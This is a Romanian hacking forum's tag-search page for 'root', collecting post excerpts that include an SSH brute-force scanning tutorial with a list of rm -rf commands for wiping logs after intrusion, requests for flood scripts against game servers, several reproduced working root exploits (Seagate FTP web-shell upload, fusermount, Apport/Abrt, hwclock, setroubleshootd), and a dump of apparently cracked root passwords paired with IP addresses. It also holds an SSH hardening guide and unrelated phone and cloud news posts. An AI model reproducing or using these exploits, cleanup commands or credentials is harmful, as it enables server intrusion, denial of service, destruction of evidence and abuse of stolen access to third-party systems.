Jump to content

Search the Community

Showing results for tags 'root'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Toti cauta sa sparga rooturi sau alte servici de care pot profita in mediul online..Un exemplu de "munca" ar fi: De ce avem nevoie: -1- bucata scanner ssh -2- bucata brute force ssh -3- 2 in 1 .... Avem nevoie de scannerul: unixcod Descarcam scannerul:2shared - download unixcod.tar.gz PS : tool-ul folosit este unul destul de comod care se descurca destul de bine , dar totusi , daca vrei sa furi ceva bun ai nevoie de ceva pe masura. Deschidem consola.. Folosim comanda de extragere: sudo tar -zxvf <sursa fisier> Fisierul este extras..acum frumos selectam din consola calea catre folder: cd <sursa fisier> Acum ca sa pornim scannerul , in folderul sursa , dam comanda: ./unix ip.ip Unde ip sunt primele 2 rangeuri dintr-un ip , de exemplu din ip-ul 100.111.122.133 luam doar 100.111. EXEMPLU: Start scan: user@user-desktop:~/unixcod$ ./unix 70.70 [+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+] [+] SSH Brute force scanner : user & password [+] [+] Undernet Channel : #UnixCoD [+] [+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+] [+] Scanam: 70.70.4.* (total: 2) (1.6% done) Scan finish: [+] Find ip a terminat in 530 de secunde. [Am gasit 66 ip`uri] [+] Incepe partea cea mai misto [+] Doar 66 de servere. Exista un inceput pt. toate ! [=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=] [+] Incepem sa vedem cate server putem sparge [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Scanner a terminat de scanat ! Cand acceseri un root/server web e bine sa iti stergi logurile , in masura permisiunilor furate: Avem comenzile urmatoare ______________________________________________ | | +LOG REMOVE SHELL COMAND+ | | |___|____________________________________|___| | + | rm -rf unixcod | + | | + | rm -rf /tmp/logs | + | | + | rm -rf $HISTFILE | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_history | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_logout | + | | + | rm -rf /usr/local/apache/logs | + | | + | rm -rf /usr/local/apache/log | + | | + | rm -rf /var/apache/logs | + | | + | rm -rf /var/apache/log | + | | + | rm -rf /var/run/utmp | + | | + | rm -rf /var/logs | + | | + | rm -rf /var/log | + | | + | rm -rf /var/adm | + | | + | rm -rf /etc/wtmp | + | | + | rm -rf /etc/utmp | + | | + | | + | | + |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| + | | + | | + | |_+_|____________________________________|_+_| Alte completari o sa aduc in masura intrebarilor postate.
  2. Salutare oameni buni am telefon Allview a5 ready si am nevoie de un backup stock rom pentru a-mi reface telefonul cu sp flashtool cine are acest telefon va rog sa ma ajutati cu un link de download.Ajutati-ma sa imi refac telefonul...VA ROG.
  3. La intrebarea "de ce da Google vps gratuit?" raspunsul e: are bani de la Apple ========================= Alphabet's Google has quietly scored a major coup in its campaign to become an enterprise cloud computing powerhouse, landing Apple as a customer for the Google Cloud Platform, multiple sources with knowledge of the matter told CRN this week. Since inking the Google deal late last year, Apple has also significantly reduced its reliance on Amazon Web Services, whose infrastructure it uses to run parts of iCloud and other services, said the sources, who all requested anonymity to protect their relationships with the vendors. Apple has not abandoned AWS entirely and remains a customer, the sources said. http://bcove.me/f9j5ajd4 According to the sources, Google executives have told partners that Apple is spending between $400 million and $600 million on Google Cloud Platform, although this couldn’t be independently confirmed. Also unclear is whether this range refers to an annual spending rate or a set amount of capacity. AWS said Apple's move to work with Google does not signify "competitive defection." “It’s kind of a puzzler to us because vendors who understand doing business with enterprises respect [non-disclosure agreements] with their customers and don’t imply competitive defection where it doesn’t exist," said the AWS spokeswoman in an emailed statement sent to CRN late Wednesday. Spokespeople from Google and Apple weren’t immediately available for comment. Morgan Stanley, in a report released last month, estimated that Apple spends around $1 billion annually on AWS, but speculated that Apple may look to reduce that figure by moving more computing to its own data centers. Cupertino, Calif.-based Apple is spending $3.9 billion to build new data centers in Arizona, Ireland and Denmark, the first of which is set to open later this year. While it might seem odd for Apple to give business to a cloud service run by a bitter rival in the mobile device market, such arrangements aren’t uncommon in a public cloud market that’s seeing intense pricing pressure, particularly in compute and storage services. Reports of Apple using AWS and Microsoft Azure to run parts of its cloud services date back to 2011, although neither AWS nor Microsoft has ever confirmed that Apple is a customer. But in an Apple iOS Security white paper published in 2014, Apple acknowledged that encrypted portions of some iOS files are stored in Amazon S3 and Microsoft Azure. Mountain View, Calif.-based Google, which last November hired VMware co-founder and former CEO Diane Greene to lead its cloud business, is said to be aggressively forming partnerships and swinging deals to bring in large enterprise customers. Last month, Google signed up Spotify, which runs part of its streaming music service on AWS, as a cloud customer. CRN reported last month that Google and Verizon were in talks about a strategic partnership involving a Verizon-branded hybrid cloud service running on Google Cloud Platform. Although Google doesn’t break out cloud revenue, signing up Apple -- no matter what the size of the deal -- would give a huge boost to a vendor widely perceived as the distant No. 3 player behind AWS and Microsoft Azure in the public cloud. In the fourth quarter of last year, Google sales for only its Infrastructure-as-a-Service and Platform-as-a-Service products -- Compute Engine and App Engine -- came in under $300 million, according to an estimate from Synergy Research. That's seven times less than the respective business for AWS, John Dinsdale, Synergy's chief analyst, told CRN. Google entered the cloud market with a vow to undercut Seattle-based AWS on pricing, and industry watchers said Apple could gain pricing leverage with AWS and Microsoft by virtue of its Google cloud deal. Google's extensive fiber network linking its data centers is said to be a major competitive advantage when it comes to networking bandwidth costs. Cheaper networking would present significant savings for Apple data services like iCloud, iTunes and App Store, which must either push content to customers or shuttle massive amounts of backup data to the provider. "Google is laying a lot more fiber in a lot more areas, so they have a lot more reach [than other cloud players]," Michael Fraser, CEO of InfiniteOps, a cloud vendor that works with Google and other public cloud vendors, told CRN. Although Fraser said he doesn’t have direct knowledge of Apple's deal with Google, he believes that Google is getting better at winning enterprise customers because it offers superior performance and pricing. "Google is actually the cheapest play in the market when you take into consideration everything they're doing and when you take into account their various incentives," Fraser said. "[They offer the] most cost savings, lowest pricing for what you actually get." Fraser said Google Cloud Platform, according to his company’s internal testing, has "better performance than any of the other major cloud providers." While AWS is the cloud of choice for many startups that can't afford or don't want to build their own infrastructure, it also has a growing list of big-name enterprise customers. Google has seen a slower march of customers to its cloud, a list that includes Snapchat, PricewaterhouseCoopers, General Mills, Coca-Cola, HTC and Best Buy. AWS has such a huge lead in the public cloud space -- with a 31 percent share of the market in the fourth quarter compared with Google's 4 percent, according to Synergy -- that losing some of Apple’s business likely won’t leave a lasting impact. Market researcher Gartner said last May that AWS has more cloud capacity in use than its next 14 competitors combined. SOURCE
  4. Salut RST Am nevoie de un program sau un script in root pentru a da flood serverelor de Metin2, am incercat udp.pl pe root dar nimic nu am reusit. Va rog fara glume sau mistouri, daca ma puteti ajuta bine daca nu nu, nu vreau comentarii inutile
  5. caut root eth0 eth1 pt scanat contracost.ms
  6. Ma poate ajuta si pe mine cineva cu un tutorial de root xperia z3 compact ... cei de la XDA spun ca dupa root se duce aplicatia de camera :S oare asa e
  7. #!/usr/bin/python # seagate_ftp_remote_root.py # # Seagate Central Remote Root Exploit # # Jeremy Brown [jbrown3264/gmail] # May 2015 # # -Synopsis- # # Seagate Central by default has a passwordless root account (and no option to change it). # One way to exploit this is to log into it's ftp server and upload a php shell to the webroot. # From there, we can execute commands with root privileges as lighttpd is also running as root. # # -Fixes- # # Seagate scheduled it's updates to go live on April 28th, 2015. # # Tested Firmware Version: 2014.0410.0026-F # import sys from ftplib import FTP port = 21 php_shell = """ <?php if(isset($_REQUEST['cmd'])) { $cmd = ($_REQUEST["cmd"]); echo "<pre>$cmd</pre>"; system($cmd); } ?> """ php_shell_filename = "shell.php" seagate_central_webroot = "/cirrus/" def main(): if(len(sys.argv) < 2): print("Usage: %s <host>" % sys.argv[0]) return host = sys.argv[1] try: with open(php_shell_filename, 'w') as file: file.write(php_shell) except Exception as error: print("Error: %s" % error); return try: ftp = FTP(host) ftp.login("root") ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb')) ftp.close() except Exception as error: print("Error: %s" % error); return print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename)) return if __name__ == "__main__": main() Sursa > https://dl.packetstormsecurity.net/1506-exploits/seagate_ftp_remote_root.py.txt
  8. Hello, During a recent assessment I have stumbled across a system which had hwclock(8) setuid root hwclock is a part of util-linux, all versions affected $ man hwclock | sed -n '223,231p' Users access and setuid Sometimes, you need to install hwclock setuid root. If you want users other than the superuser to be able to display the clock value using the direct ISA I/O method, install it setuid root. If you have the /dev/rtc interface on your system or are on a non-ISA system, there's probably no need for users to use the direct ISA I/O method, so don't bother. In any case, hwclock will not allow you to set anything unless you have the superuser real uid. (This is restriction is not necessary if you haven't installed setuid root, but it's there for now). http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L2041 "The program is designed to run setuid superuser, since we need to be able to do direct I/O. (More to the point: we need permission to execute the iopl() system call). (However, if you use one of the methods other than direct ISA I/O to access the clock, no setuid is required)." http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L1920 "program is designed to run setuid (in some situations)" Some comments in code and unfortunately also man page advertising that setuid is no problem. That's pretty stupid promise. from util-linux/2.26.2-5/sys-utils/hwclock.c http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L748 /* Quotes in date_opt would ruin the date command we construct. */ if (strchr(date_opt, '"') != NULL) { warnx(_ ("The value of the --date option is not a valid date.\n" "In particular, it contains quotation marks.")); return 12; } sprintf(date_command, "date --date=\"%s\" +seconds-into-epoch=%%s", date_opt); [...] date_child_fp = popen(date_command, "r"); [...] hwclock uses popen() to date_command which is 'date --date=\"%s\" +seconds-into-epoch=%%s' Exploiting is trivial, since $PATH is user-controlled $ ls -l /usr/sbin/hwclock -rwsr-sr-x. 1 root root 48096 Nov 27 14:10 /usr/sbin/hwclock $ cat > date.c;gcc date.c -o date main() { chown("/tmp/sploit", 0, 0); chmod("/tmp/sploit", 04755); } ^D $ cp /bin/sh /tmp/sploit $ PATH=".:$PATH" /usr/sbin/hwclock --set --date="05/23/2015 20:35:37" hwclock: The date command issued by hwclock returned unexpected results. The command was: date --date="05/23/2015 20:35:37" +seconds-into-epoch=%s The response was: hwclock: No usable set-to time. Cannot set clock. $ /tmp/sploit # id euid=0(root) groups=0(root) *Insert CVE Request here* Notes: Please note that this is possible on Debian-derived (and therefore Ubuntu), because /bin/sh is provided by dash which does NOT make use of privmode (does not drop privileges if ruid != euid, unlike bash), which is a very stupid idea. privmode is surprisingly effective at mitigating some common vulnerability classes and misconfigurations, and it has been around since mid 90's. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3)/popen(3) calls in setuid executables" TL;DR: When setuid root, hwclock relies on $PATH to popen() the date command, meaning privilege escalation can occur since $PATH is user-controlled. Patches are available, signed off by Karel Zak <kzak@redhat.com> https://github.com/karelzak/util-linux/commit/687cc5d58942b24a9f4013c68876d8cbea907ab1 Initial bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=786804 Thanks, Federico Bento. ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program. Source: http://dl.packetstormsecurity.net/1505-exploits/hwclock-escalate.txt
  9. # Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 # Here's how it works, $a holds the name of a shellscript to be executed as # root. a=/tmp/.$$; # $b is used twice, first to build the contents of shellscript $a, and then as # a command to make $a executable. Quotes are unused to save a character, so # the seperator must be escaped. b=chmod\ u+sx; # Build the shellscript $a, which should contain "chmod u+sx /bin/sh", making # /bin/sh setuid root. This only works on Debian/Ubuntu because they use dash, # and dont make it drop privileges. # # http://www.openwall.com/lists/oss-security/2013/08/22/12 # echo $b /bin/sh>$a; # Now make the $a script executable using the command in $b. This needlessly # sets the setuid bit, but that doesn't do any harm. $b $a; # Now make $a the directory we want fusermount to use. This directory name is # written to an arbitrary file as part of the vulnerability, so needs to be # formed such that it's a valid shell command. a+=\;$a; # Create the mount point for fusermount. mkdir -p $a; # fusermount calls setuid(geteuid()) to reset the ruid when it invokes # /bin/mount so that it can use privileged mount options that are normally # restricted if ruid != euid. That's acceptable (but scary) in theory, because # fusermount can sanitize the call to make sure it's safe. # # However, because mount thinks it's being invoked by root, it allows # access to debugging features via the environment that would not normally be # safe for unprivileged users and fusermount doesn't sanitize them. # # Therefore, the bug is that the environment is not cleared when calling mount # with ruid=0. One debugging feature available is changing the location of # /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary # files. # # In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the # current shell from $0...so it only works if you're using bash!). # # The line written by fusermount will look like this: # # /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx # # Which will try to execute /dev/fuse with the paramter /tmp/_, fail because # /dev/fuse is a device node, and then execute /tmp/_ with the parameters fuse # xxx,xxx,xxx,xxx. This means executing /bin/sh will give you a root shell the # next time root logs in. # # Another way to exploit it would be overwriting /etc/default/locale, then # waiting for cron to run /etc/cron.daily/apt at midnight. That means root # wouldn't have to log in, but you would have to wait around until midnight to # check if it worked. # # And we have enough characters left for a hash tag/comment. LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 # Here is how the exploit looks when you run it: # # $ a=/tmp/_;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 # fusermount: failed to open /etc/fuse.conf: Permission denied # sending file descriptor: Socket operation on non-socket # $ cat /etc/bash.bashrc # /dev/fuse /tmp/_;/tmp/_ fuse rw,nosuid,nodev,user=taviso 0 0 # # Now when root logs in next... # $ sudo -s # bash: /dev/fuse: Permission denied # # ls -Ll /bin/sh # -rwsr-xr-x 1 root root 121272 Feb 19 2014 /bin/sh # # exit # $ sh -c 'id' # euid=0(root) groups=0(root) # # To repair the damage after testing, do this: # # $ sudo rm /etc/bash.bashrc # $ sudo apt-get install -o Dpkg::Options::="--force-confmiss" --reinstall -m bash # $ sudo chmod 0755 /bin/sh # $ sudo umount /tmp/.$$\;/tmp/.$$ # $ rm -rf /tmp/.$$ /tmp/.$$\; # Sursa: http://dl.packetstormsecurity.net/1505-exploits/fusermount-escalate.txt
  10. Salutare RST, Cum spune si titlu.. Cumpar un root.. Vreau oameni seriosi... Reply/pm P.S : Ma scuzati daca am greit categoria..
  11. RooT Flood + PERL 1. vps Ukrainian data center. VPS Hosting. 2. 10 minute 10 Minute Mail 2. perl esl.pl http://andreyesl.16mb.com/esl.pl Like and subscribe ! THANKS!!! https://www.youtube.com/watch?v=AFmPVdAB4kY
  12. RooT Flood 100% Free Linux https://www.youtube.com/watch?v=AFmPVdAB4kY
  13. [CVE-2015-1318,CVE-2015-1862] Apport/Abrt Local Root Exploit #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <signal.h> #include <elf.h> #include <err.h> #include <syslog.h> #include <sched.h> #include <linux/sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/auxv.h> #include <sys/wait.h> # warning this file must be compiled with -static // // Apport/Abrt Vulnerability Demo Exploit. // // Apport: CVE-2015-1318 // Abrt: CVE-2015-1862 // // -- taviso@cmpxchg8b.com, April 2015. // // $ gcc -static newpid.c // $ ./a.out // uid=0(root) gid=0(root) groups=0(root) // sh-4.3# exit // exit // // Hint: To get libc.a, // yum install glibc-static or apt-get install libc6-dev // int main(int argc, char **argv) { int status; Elf32_Phdr *hdr; pid_t wrapper; pid_t init; pid_t subprocess; unsigned i; // Verify this is a static executable by checking the program headers for a // dynamic segment. Originally I thought just checking AT_BASE would work, // but that isnt reliable across many kernels. hdr = (void *) getauxval(AT_PHDR); // If we find any PT_DYNAMIC, then this is probably not a static binary. for (i = 0; i < getauxval(AT_PHNUM); i++) { if (hdr[i].p_type == PT_DYNAMIC) { errx(EXIT_FAILURE, "you *must* compile with -static"); } } // If execution reached here, it looks like we're a static executable. If // I'm root, then we've convinced the core handler to run us, so create a // setuid root executable that can be used outside the chroot. if (getuid() == 0) { if (chown("sh", 0, 0) != 0) exit(EXIT_FAILURE); if (chmod("sh", 04755) != 0) exit(EXIT_FAILURE); return EXIT_SUCCESS; } // If I'm not root, but euid is 0, then the exploit worked and we can spawn // a shell and cleanup. if (setuid(0) == 0) { system("id"); system("rm -rf exploit"); execlp("sh", "sh", NULL); // Something went wrong. err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked"); } // It looks like the exploit hasn't run yet, so create a chroot. if (mkdir("exploit", 0755) != 0 || mkdir("exploit/usr", 0755) != 0 || mkdir("exploit/usr/share", 0755) != 0 || mkdir("exploit/usr/share/apport", 0755) != 0 || mkdir("exploit/usr/libexec", 0755) != 0) { err(EXIT_FAILURE, "failed to create chroot directory"); } // Create links to the exploit locations we need. if (link(*argv, "exploit/sh") != 0 || link(*argv, "exploit/usr/share/apport/apport") != 0 // Ubuntu || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) { // Fedora err(EXIT_FAILURE, "failed to create required hard links"); } // Create a subprocess so we don't enter the new namespace. if ((wrapper = fork()) == 0) { // In the child process, create a new pid and user ns. The pid // namespace is only needed on Ubuntu, because they check for %P != %p // in their core handler. On Fedora, just a user ns is sufficient. if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0) err(EXIT_FAILURE, "failed to create new namespace"); // Create a process in the new namespace. if ((init = fork()) == 0) { // Init (pid 1) signal handling is special, so make a subprocess to // handle the traps. if ((subprocess = fork()) == 0) { // Change /proc/self/root, which we can do as we're privileged // within the new namepace. if (chroot("exploit") != 0) { err(EXIT_FAILURE, "chroot didnt work"); } // Now trap to get the core handler invoked. __builtin_trap(); // Shouldn't happen, unless user is ptracing us or something. err(EXIT_FAILURE, "coredump failed, were you ptracing?"); } // If the subprocess exited with an abnormal signal, then everything worked. if (waitpid(subprocess, &status, 0) == subprocess) return WIFSIGNALED(status) ? EXIT_SUCCESS : EXIT_FAILURE; // Something didn't work. return EXIT_FAILURE; } // The new namespace didn't work. if (waitpid(init, &status, 0) == init) return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS ? EXIT_SUCCESS : EXIT_FAILURE; // Waitpid failure. return EXIT_FAILURE; } // If the subprocess returned sccess, the exploit probably worked, reload // with euid zero. if (waitpid(wrapper, &status, 0) == wrapper) { // All done, spawn root shell. if (WIFEXITED(status) && WEXITSTATUS(status) == 0) { execl(*argv, "w00t", NULL); } } // Unknown error. errx(EXIT_FAILURE, "unexpected result, cannot continue"); } Apport - Local Linux Root #!/bin/sh # # CVE-2015-1318 # # Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758 # # Example: # # % uname -a # Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux # # % lsb_release -a # No LSB modules are available. # Distributor ID: Ubuntu # Description: Ubuntu 14.04.2 LTS # Release: 14.04 # Codename: trusty # # % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 " " $3 }' # apport 2.14.1-0ubuntu3.8 # # % id # uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...) # # % ./apport.sh # pwned-4.3# id # uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...) # pwned-4.3# exit TEMPDIR=$(mktemp -d) cd ${TEMPDIR} cp /bin/busybox . mkdir -p dev mnt usr/share/apport ( cat << EOF #!/busybox sh ( cp /mnt/1/root/bin/bash /mnt/1/root/tmp/pwned chmod 5755 /mnt/1/root/tmp/pwned ) EOF ) > usr/share/apport/apport chmod +x usr/share/apport/apport ( cat << EOF mount -o bind . . cd . mount --rbind /proc mnt touch dev/null pivot_root . . ./busybox sleep 500 & SLEEP=\$! ./busybox sleep 1 ./busybox kill -11 \$SLEEP ./busybox sleep 5 EOF ) | lxc-usernsexec -m u:0:$(id -u):1 -m g:0:$(id -g):1 2>&1 >/dev/null -- \ lxc-unshare -s "MOUNT|PID|NETWORK|UTSNAME|IPC" -- /bin/sh 2>&1 >/dev/null /tmp/pwned -p rm -Rf ${TEMPDIR}
  14. Care ma poate ajuta cu un ROOT nu conteaza , multumesc .
  15. Am si eu un desire 500 si nu ii pot face root, am inteles ca trebuie sa ii instalez prima orara CMW recovery...si nu prea stiu cum ,am cautat pe la tutoriale de mi-a venit rau ,multe in engleza , un pic de ajutor ?
  16. Fisierul de configurare al SSH se afla il gasiti aici /etc/ssh/sshd_config. 1. Creare user de login. Se creaza un user pe server folosind litere mari, mici si numere pentru evitarea dictionarelor si o parola cat mai complexa. Exemplu eT40Pkh2. Acestui user nu i se vor da drepturi pe server. 2. Dezactivare root login. Se cauta parametrul PermitRootLogin. Daca e comentat, se decomenteaza sau daca lipseste se adauga si se se seteaza no: PermitRootLogin no 3. Se activeaza AllowUsers Acest parametru permite logarea prin SSH doar userilor care sunt trecuti in acest parametru. Se cauta parametrul AllowUsers. Daca e comentat, se decomenteaza sau daca lipseste se adauga si se adauga userul in dreptul parametrului. AllowUsers eT40Pkh2 sau varianta cu mai multi useri: AllowUsers eT40Pkh2 user2 user3 4. Schimbarea portului. Se schimba portul pe unul care nu este folosit. Exemplu 45753. Se cauta parametrul Port. Daca e comentat, se decomenteaza sau daca lipseste se adauga si se schimba 22 cu portul dorit. Port 45753 5. Setare timeout Se cauta parametrul ClientAliveInterval si ClientAliveCountMax. Daca sunt comentate, se decomenteaza sau daca lipsesc se adauga si se seteaza intervalul in secunde la ClientAliveInterval. Ex. 900 (15 min). Si si ClientAliveCountMax 0 ClientAliveInterval 900 ClientAliveCountMax 0 6. Instalare fail2ban Fail2ban este un tool care baneaza IP-urile care incearca sa se logheze prin SSH cu user/pass gresite. In functie de distributie: sudo apt-get install fail2ban sau sudo yum install fail2ban Se seteaza in /etc/fail2ban/jail.conf bantime = 600 maxretry = 3 (sau cum le doriti) /etc/init.d/fail2ban restart /etc/init.d/sshd restart Imbunatatiri se mai pot aduce dar acestea sunt setarile pe care le consider must have. Daca considera cineva ca am omis un "must have" e liber sa isi aduca contributia. Logarea pe server se va face in felul urmator: ssh eT40Pkh2@serverip -p45753
  17. setroubleshoot tries to find out which rpm a particular file belongs to when it finds SELinux access violation reports. The idea is probably to have convenient reports for the admin which type enforcement rules have to be relaxed. setroubleshoot runs as root (although in its own domain). In util.py we have: 266 def get_rpm_nvr_by_file_path_temporary(name): 267 if name is None or not os.path.exists(name): 268 return None 269 270 nvr = None 271 try: 272 import commands 273 rc, output = commands.getstatusoutput("rpm -qf '%s'" % name) 274 if rc == 0: 275 nvr = output 276 except: 277 syslog.syslog(syslog.LOG_ERR, "failed to retrieve rpm info for %s" % name) 278 return nvr (and other similar occurences) So. Yes, thats correct: The SELinux system that is only there to protect you, passes attacker controlled data to sh -c (https://docs.python.org/2/library/commands.html) inside a daemon running as root. Sacken lassen... I attached a PoC which uses networkmanager's openvpn plugin to execute arbitraty commands by triggering an access violation to a pathname which contains shell commands. The setroubleshootd_t domain has quite a lot of allowed rules and transitions, so this can clearly count as privilege escalation. Furthermore a lot of admins run their system in permissive mode (full root) even when its shipped enforcing by default. Also note that there are potentially remote vectors, if attackers can control part of the filenames being created (web uploads, git, scp, ftp etc). Sebastian PS: I am all for SELinux but theres something on the wrong way. I counted the LOC, and the core SELinux (kernel) has a smaller codebase than whats framed around in python, running as root and mangling attacker controlled input. IOW, the system that wants to protect you has fewer code enforcing the rules than code that potentially blows up your system. And that code is python, so let alone all the python modules and interpreter hat can have bugs on its own. Driving such a lane _can only lead to abyss_. And I am not saying that evil powers are creating an overly complex system to better hide their bugdoors within. PPS: bug-logo will follow -- ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer () suse de - SuSE Security Team #!/usr/bin/perl # # Fedora21 setroubleshootd local root PoC # # (C) 2015 Sebastian Krahmer # # - requires polkit authorization to add/mod VPN connections # to NetworkManager (default on desktop user) # - after execution of this script, which adds appropriate # NM connection entries, try # # $ nmcli c up vpn-FOOBAR # # a couple of times, until you see: # # logger[4062]: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:setroubleshootd_t:... # # in the journalctl logs # # PS: I know in advance what the SELinux developers will say... # # I say: lulz! # create a pathname that setroubleshootd will eventually # query sh -c { rpm -qf ... with, fucking up ' escaping. So the # embedded pathname is then evaluated as command # # There goes your NSA-grade SELinux security!!! $file = "/tmp/foo.pem';`id|logger`;echo '"; open(O, ">", $file) or die $!; close O; # add connection system("nmcli c add type vpn ifname FOOBAR vpn-type openvpn"); open(O,"|nmcli c edit vpn-FOOBAR") or die $!; print O "set vpn.data ca = /tmp/foo.pem';`id|logger`;echo ', password-flags = 1, connection-type = password, remote = 1.2.3.4, username = FOOBAR\n"; print O "set vpn.secrets password=1\nsave\nquit\n"; close(O); print "Now do 'nmcli c up vpn-FOOBAR' and watch logs.\n"; Source
  18. Am un root, ce pot face cu el? Cum il pot face root de scan sau de flood?
  19. SirAlx

    SSH V2!

    Greets to: Molo !!! & Hater for supporting free shares! Pls, lasati-mi thread-ul cu invidia voastra, eu dau free, majoritatea cer bani pe ce postez, RST hope you enjoy. Netestate ! L-amPrins... !! -><!--:member1 server //-->:191.103.115.27 root@kali:~/gblscanner# L-amPrins... !! ->admin:admin:190.16.178.227 DUP L-amPrins... !! ->root:root:191.103.115.27 L-amPrins... !! ->oracle:oracle:191.33.168.143 DUP L-amPrins... !! ->admin:admin123:190.16.178.227 L-amPrins... !! ->root:r00t123:67.49.161.163 L-amPrins... !! ->root:r00t123:67.49.167.41 L-amPrins... !! ->root:r00t123:67.49.160.23 L-amPrins... !! ->root:r00t123:67.49.160.143 L-amPrins... !! ->root:r00t123:67.49.160.34 L-amPrins... !! ->root:r00t123:67.49.163.126 L-amPrins... !! ->root:r00t123:67.49.175.130 L-amPrins... !! ->root:r00t123:67.49.168.142 L-amPrins... !! ->root:r00t123:67.49.173.188 L-amPrins... !! ->root:r00t123:67.49.175.141 DUP L-amPrins... !! ->root:password:67.49.160.23 DUP L-amPrins... !! ->root:password:67.49.167.41 DUP L-amPrins... !! ->root:password:67.49.161.163 DUP L-amPrins... !! ->root:password:67.49.163.126 DUP L-amPrins... !! ->root:password:67.49.160.34 DUP L-amPrins... !! ->root:password:67.49.175.130 DUP L-amPrins... !! ->root:111111:67.49.160.23 L-amPrins... !! ->root:r00t123:94.211.186.5 DUP L-amPrins... !! ->root:111111:67.49.163.126 DUP L-amPrins... !! ->root:111111:67.49.161.163 DUP L-amPrins... !! ->root:111111:67.49.160.34 DUP L-amPrins... !! ->root:111111:67.49.175.130 DUP L-amPrins... !! ->root:password:94.211.186.5 DUP L-amPrins... !! ->root:123456:67.49.163.126 DUP L-amPrins... !! ->root:123456:67.49.161.163 DUP L-amPrins... !! ->root:123456:67.49.160.34 DUP L-amPrins... !! ->root:123456:67.49.175.130 DUP L-amPrins... !! ->root:111111:94.211.186.5 DUP L-amPrins... !! ->root:123456:94.211.186.5 L-amPrins... !! ->root:r00t123:67.252.144.133 L-amPrins... !! ->root:r00t123:67.252.144.151 L-amPrins... !! ->root:r00t123:67.252.144.145 L-amPrins... !! ->root:r00t123:67.252.144.158 L-amPrins... !! ->root:r00t123:67.252.145.130 L-amPrins... !! ->root:r00t123:67.252.145.68 L-amPrins... !! ->root:r00t123:67.252.145.78 L-amPrins... !! ->root:r00t123:67.252.145.92 L-amPrins... !! ->root:r00t123:67.252.158.12 L-amPrins... !! ->root:r00t123:67.252.146.108 L-amPrins... !! ->root:r00t123:67.252.154.219 L-amPrins... !! ->root:r00t123:67.252.151.132 L-amPrins... !! ->root:r00t123:67.252.162.10 L-amPrins... !! ->root:r00t123:67.252.150.245 L-amPrins... !! ->root:r00t123:67.252.148.67 L-amPrins... !! ->root:r00t123:67.252.162.68 L-amPrins... !! ->root:r00t123:67.252.163.66 DUP L-amPrins... !! ->root:password:67.252.144.151 L-amPrins... !! ->root:r00t123:67.252.171.244 L-amPrins... !! ->root:r00t123:67.252.170.55 DUP L-amPrins... !! 